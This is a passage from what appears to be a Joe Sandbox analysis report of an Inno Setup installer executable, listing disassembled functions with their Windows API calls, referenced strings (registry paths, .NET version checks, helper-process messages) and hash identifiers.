                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                                              • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
                                                                              • API String ID: 4012871263-351310198
                                                                              • Opcode ID: b8857b922522f3f755a45729126c2f0d9cd80f0de934d6ab31d5c47b9e38ba38
                                                                              • Instruction ID: 9fa33364040fb067cffbf7544db289955a363cad08101e599f84dfab4c508334
                                                                              • Opcode Fuzzy Hash: b8857b922522f3f755a45729126c2f0d9cd80f0de934d6ab31d5c47b9e38ba38
                                                                              • Instruction Fuzzy Hash: D7916370A042059FDB10EBA9D845B9EB7B5EB08305F10857BE814EB383DB789948CF69
                                                                              APIs
                                                                              • GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                              • SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                              • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                              • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                              • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                              • FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                              • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                              • API String ID: 2323315520-3614243559
                                                                              • Opcode ID: 51cb45610875762faf6d6cb9dc15dbb0f4a8b87cdd32b8fce74619213e256557
                                                                              • Instruction ID: cf5be9d6f1a649145535b6a7131e14805afeac8bde6fe10f2a473d18be96f611
                                                                              • Opcode Fuzzy Hash: 51cb45610875762faf6d6cb9dc15dbb0f4a8b87cdd32b8fce74619213e256557
                                                                              • Instruction Fuzzy Hash: D63110B1640700EBDF00EBF9AC86A653294F729724745093FB648DB192DB7E485ECB1D
                                                                              APIs
                                                                              • 73A1A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
                                                                              • 73A24C40.GDI32(?,00000000,?,0041A954,?), ref: 0041CA5C
                                                                              • 73A26180.GDI32(0041A954,?,00000001,00000001,00000000,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA80
                                                                              • 73A24C00.GDI32(?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA90
                                                                              • SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
                                                                              • FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
                                                                              • SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
                                                                              • SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
                                                                              • PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
                                                                              • 73A24C40.GDI32(?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954), ref: 0041CB3B
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
                                                                              • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954), ref: 0041CB84
                                                                              • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?), ref: 0041CB8D
                                                                              • 73A18830.GDI32(0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CB9C
                                                                              • 73A122A0.GDI32(0041CE4C,0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CBA5
                                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
                                                                              • SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
                                                                              • 73A24D40.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC1A,?,?,00000000), ref: 0041CBF1
                                                                              • SelectObject.GDI32(00000000,?), ref: 0041CBFE
                                                                              • DeleteDC.GDI32(00000000), ref: 0041CC14
                                                                                • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Color$ObjectSelect$A122A18830Text$A26180A570DeleteFillRect
                                                                              • String ID:
                                                                              • API String ID: 1381628555-0
                                                                              • Opcode ID: aa3120a436c449d3c69836d856a65b18742abf0f47e61156e5e14d2e6b4a0b24
                                                                              • Instruction ID: 69ed6b4e4825e3c47d53d1ee88e95f0281db4649dcd7e45998b3becab3701dfd
                                                                              • Opcode Fuzzy Hash: aa3120a436c449d3c69836d856a65b18742abf0f47e61156e5e14d2e6b4a0b24
                                                                              • Instruction Fuzzy Hash: 6261EC71A44609AFDF10EBE9DC86F9FB7B8EF48704F14446AB504E7281D67CA9408B68
                                                                              APIs
                                                                              • ShowWindow.USER32(?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000,?,00496FE3,00000000,00496FED,?,00000000), ref: 00496917
                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000,?,00496FE3,00000000), ref: 0049692A
                                                                              • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000), ref: 0049693A
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0049695B
                                                                              • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000), ref: 0049696B
                                                                                • Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,0045559A,00000000,00455602), ref: 0042D44D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                              • String ID: $pI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$oI$oI
                                                                              • API String ID: 2000705611-3392794427
                                                                              • Opcode ID: a02d3fed669f7fb7c340bf5c1bb211ceb87890bb9eb81734911f04de300cbb5a
                                                                              • Instruction ID: 31cdb79ee62171b288e36ce2cb74f04ee829b5848567b5503989d80848a91494
                                                                              • Opcode Fuzzy Hash: a02d3fed669f7fb7c340bf5c1bb211ceb87890bb9eb81734911f04de300cbb5a
                                                                              • Instruction Fuzzy Hash: 1191D530A04255AFDF11EBA5C852BAF7FA4EB49304F528477F500AB2C2D67DAC05CB69
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000000,0045A0B4,?,?,?,?,?,00000006,?,00000000,00495CC7,?,00000000,00495D6A), ref: 00459F66
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                              • API String ID: 1452528299-3112430753
                                                                              • Opcode ID: b40920f120a9bf38da6ee553801966ffb6b78c7b5657bb9011c081c98828634e
                                                                              • Instruction ID: 69f6fbefbe6f055fc938da3b3950c8fb4cadcfc16d4dd4dc981ad9326b9f7ff7
                                                                              • Opcode Fuzzy Hash: b40920f120a9bf38da6ee553801966ffb6b78c7b5657bb9011c081c98828634e
                                                                              • Instruction Fuzzy Hash: 5D71B130B102049BCB00EF6998827AE77A5AF49716F50856BFC05DB383DB7C9E4D875A
                                                                              APIs
                                                                              • GetVersion.KERNEL32 ref: 0045C2FA
                                                                              • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045C31A
                                                                              • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045C327
                                                                              • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045C334
                                                                              • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045C342
                                                                                • Part of subcall function 0045C1E8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C287,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C261
                                                                              • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C535,?,?,00000000), ref: 0045C3FB
                                                                              • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C535,?,?,00000000), ref: 0045C404
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                              • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                              • API String ID: 59345061-4263478283
                                                                              • Opcode ID: 4113bb8dbcd17bfcbcc3a54e2f337fa89a8317241d30fe9918db60e1e55ed00a
                                                                              • Instruction ID: 8ce8c74b38915e38562a90fe4681b9431f62f8b5bebe6c1e41ffef27034fd0c0
                                                                              • Opcode Fuzzy Hash: 4113bb8dbcd17bfcbcc3a54e2f337fa89a8317241d30fe9918db60e1e55ed00a
                                                                              • Instruction Fuzzy Hash: DF5163B1900708EFDB10DFD9C881BAEB7B8EB4D711F14806AF905B7241D678A945CFA9
                                                                              APIs
                                                                              • 73A24C40.GDI32(00000000,?,00000000,?), ref: 0041B3D3
                                                                              • 73A24C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3DD
                                                                              • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
                                                                              • 73A26180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B406
                                                                              • 73A1A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B412
                                                                              • 73A24C00.GDI32(00000000,0000000B,?,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43F
                                                                              • 73A1A480.USER32(00000000,00000000,0041B472,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B465
                                                                              • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                              • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                              • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                              • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                              • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                              • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Object$Select$Delete$A26180A480A570Stretch
                                                                              • String ID:
                                                                              • API String ID: 359944910-0
                                                                              • Opcode ID: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                              • Instruction ID: 9e854467c286a28b18f31183f63f6c048648830cb6dea2264be82148a8da808a
                                                                              • Opcode Fuzzy Hash: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                              • Instruction Fuzzy Hash: DC419D71E40619AFDF10EAE9D846FAFB7B8EF08704F104466B614FB281D67969408BA4
                                                                              APIs
                                                                                • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00471CA0
                                                                              • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00471D9F
                                                                              • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00471DB5
                                                                              • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00471DDA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                              • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                              • API String ID: 971782779-3668018701
                                                                              • Opcode ID: 0d3410c3bdf89c1015e05b6172e76740a58f53e74cadef7db015f49446f40693
                                                                              • Instruction ID: db08b3a78c5346aa08fc53deac37c7c900aaeab2e7ee66e1d047288e3336f214
                                                                              • Opcode Fuzzy Hash: 0d3410c3bdf89c1015e05b6172e76740a58f53e74cadef7db015f49446f40693
                                                                              • Instruction Fuzzy Hash: 55D11374A00149AFDB11EFA9D882BDDB7F5AF48304F50806AF804B7391D778AE45CB69
                                                                              APIs
                                                                                • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,?,00000000,?,00000000,00454029,?,0045A28A,00000003,00000000,00000000,00454060), ref: 00453EA9
                                                                                • Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                              • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,00000000,?,00000004,00000000,00453F73,?,0045A28A,00000000,00000000,?,00000000,?,00000000), ref: 00453F2D
                                                                              • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,00000000,?,00000004,00000000,00453F73,?,0045A28A,00000000,00000000,?,00000000,?,00000000), ref: 00453F5C
                                                                              Strings
                                                                              • , xrefs: 00453E1A
                                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453DC7
                                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453E00
                                                                              • RegOpenKeyEx, xrefs: 00453E2C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue$FormatMessageOpen
                                                                              • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                              • API String ID: 2812809588-1577016196
                                                                              • Opcode ID: b1af26e04a1ddbd00b5096240104ccc8619789e15be67a0962b146e22416e1b8
                                                                              • Instruction ID: 0c0f272a557b88975729148cb7875cb844f630b1a696a545db65abb6b51d3efb
                                                                              • Opcode Fuzzy Hash: b1af26e04a1ddbd00b5096240104ccc8619789e15be67a0962b146e22416e1b8
                                                                              • Instruction Fuzzy Hash: 9D912271E04208ABDB11DF95D942BDEB7F8EB48745F10406BF901FB282D6789E09CB69
                                                                              APIs
                                                                                • Part of subcall function 00458A84: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458BC1,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458AD1
                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458C1F
                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458C89
                                                                                • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458CF0
                                                                              Strings
                                                                              • .NET Framework version %s not found, xrefs: 00458D29
                                                                              • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00458BD2
                                                                              • v1.1.4322, xrefs: 00458CE2
                                                                              • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00458CA3
                                                                              • v4.0.30319, xrefs: 00458C11
                                                                              • v2.0.50727, xrefs: 00458C7B
                                                                              • .NET Framework not found, xrefs: 00458D3D
                                                                              • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00458C3C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Close$Open
                                                                              • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                              • API String ID: 2976201327-446240816
                                                                              • Opcode ID: 8254d5a6b390bed499ba7934cf142a416bdfe1caafdbe3dddb40a3d3832c2c59
                                                                              • Instruction ID: 32352305a0336a12336774107b7ff5a8d04594bb7e4f1119dbb0a5d8803071dd
                                                                              • Opcode Fuzzy Hash: 8254d5a6b390bed499ba7934cf142a416bdfe1caafdbe3dddb40a3d3832c2c59
                                                                              • Instruction Fuzzy Hash: 7351D430A041485BCB00DB65C861BEE77B6DB99305F14447FE941EB393DF399A0E8B69
                                                                              APIs
                                                                              • CloseHandle.KERNEL32(?), ref: 0045819B
                                                                              • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004581B7
                                                                              • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004581C5
                                                                              • GetExitCodeProcess.KERNEL32(?), ref: 004581D6
                                                                              • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045821D
                                                                              • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458239
                                                                              Strings
                                                                              • Helper process exited with failure code: 0x%x, xrefs: 00458203
                                                                              • Helper process exited., xrefs: 004581E5
                                                                              • Stopping 64-bit helper process. (PID: %u), xrefs: 0045818D
                                                                              • Helper isn't responding; killing it., xrefs: 004581A7
                                                                              • Helper process exited, but failed to get exit code., xrefs: 0045820F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                              • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                              • API String ID: 3355656108-1243109208
                                                                              • Opcode ID: 9811c6cb40db8456fd5d766f3d0adf9b5719f814c8999e39bf7c18c375c74eaf
                                                                              • Instruction ID: ca0659a1f7dd3987533feb970b51f52a81168d3092bf9212e29b303cc353bad7
                                                                              • Opcode Fuzzy Hash: 9811c6cb40db8456fd5d766f3d0adf9b5719f814c8999e39bf7c18c375c74eaf
                                                                              • Instruction Fuzzy Hash: 79217170604B409AD720E7B9C44574B7AD49F49305F048C6FF99AEB293DE78E8488B2A
                                                                              APIs
                                                                                • Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00453C1B,?,00000000,00453CDF), ref: 00453B6B
